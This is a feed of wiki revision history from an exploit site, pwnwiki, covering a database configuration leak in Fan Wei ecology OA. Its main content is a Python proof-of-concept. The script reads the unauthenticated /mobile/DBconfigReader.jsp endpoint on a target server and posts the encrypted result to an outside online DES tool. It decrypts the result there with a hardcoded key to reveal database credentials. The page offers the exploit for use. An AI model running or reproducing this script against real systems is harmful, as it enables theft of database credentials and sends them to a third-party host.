https://pwnwiki.com/index.php?action=history&feed=atom&title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2%2Fen
泛微ecology OA數據庫配置信息洩露/en - Revision history
2026-04-07T20:45:47Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&diff=3913&oldid=prev
SuperDolby: Created page with "==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access."
2021-06-03T03:17:27Z
<p>Created page with "==Use premise== /mobile/DBconfigReader.jsp There is unauthorized access."</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 03:17, 3 June 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"><div lang</del>=<del class="diffchange diffchange-inline">"chinese" dir</del>=<del class="diffchange diffchange-inline">"ltr" class="mw-content-ltr"></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==<ins class="diffchange diffchange-inline">Use premise</ins>==</div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline">==利用前提</del>==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>/mobile/DBconfigReader.<ins class="diffchange diffchange-inline">jsp</ins></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>/mobile/DBconfigReader.<del class="diffchange diffchange-inline">jsp存在未授權訪問。</del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div> </div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div><del class="diffchange diffchange-inline"></div></del></div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div><ins class="diffchange diffchange-inline">There is unauthorized access.</ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==POC==</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>==POC==</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-3911:rev-3913 -->
</table>
SuperDolby
https://pwnwiki.com/index.php?title=%E6%B3%9B%E5%BE%AEecology_OA%E6%95%B8%E6%93%9A%E5%BA%AB%E9%85%8D%E7%BD%AE%E4%BF%A1%E6%81%AF%E6%B4%A9%E9%9C%B2/en&diff=3911&oldid=prev
SuperDolby: Created page with "Fan Wei ecology OA database configuration information leaked"
2021-06-03T03:16:59Z
<p>Created page with "Fan Wei ecology OA database configuration information leaked"</p>
<p><b>New page</b></p><div><languages /><br />
<div lang="chinese" dir="ltr" class="mw-content-ltr"><br />
==利用前提==<br />
/mobile/DBconfigReader.jsp存在未授權訪問。<br />
</div><br />
<br />
==POC==<br />
<pre><br />
import base64<br />
import requests<br />
import ast<br />
<br />
def req(url):<br />
headers = {<br />
'Content-Type':'application/x-www-form-urlencoded',<br />
'User-Agent':'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',<br />
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',<br />
}<br />
<br />
r1 = requests.get(url,headers=headers).content<br />
s = r1.replace('\r\n','')<br />
res1 = base64.b64encode(s)<br />
<br />
postdata = {<br />
'data':res1,<br />
'type':'des',<br />
'arg':'m=ecb_pad=zero_p=1z2x3c4v_o=0_s=gb2312_t=1'<br />
}<br />
u = 'http://tool.chacuo.net/cryptdes'<br />
r2 = requests.post(u,data=postdata,headers=headers).content<br />
res2 = ast.literal_eval(r2)<br />
<br />
return res2['data']<br />
<br />
url = 'http://58.2xxx:8888//mobile/DBconfigReader.jsp'<br />
print req(url)<br />
</pre></div>
SuperDolby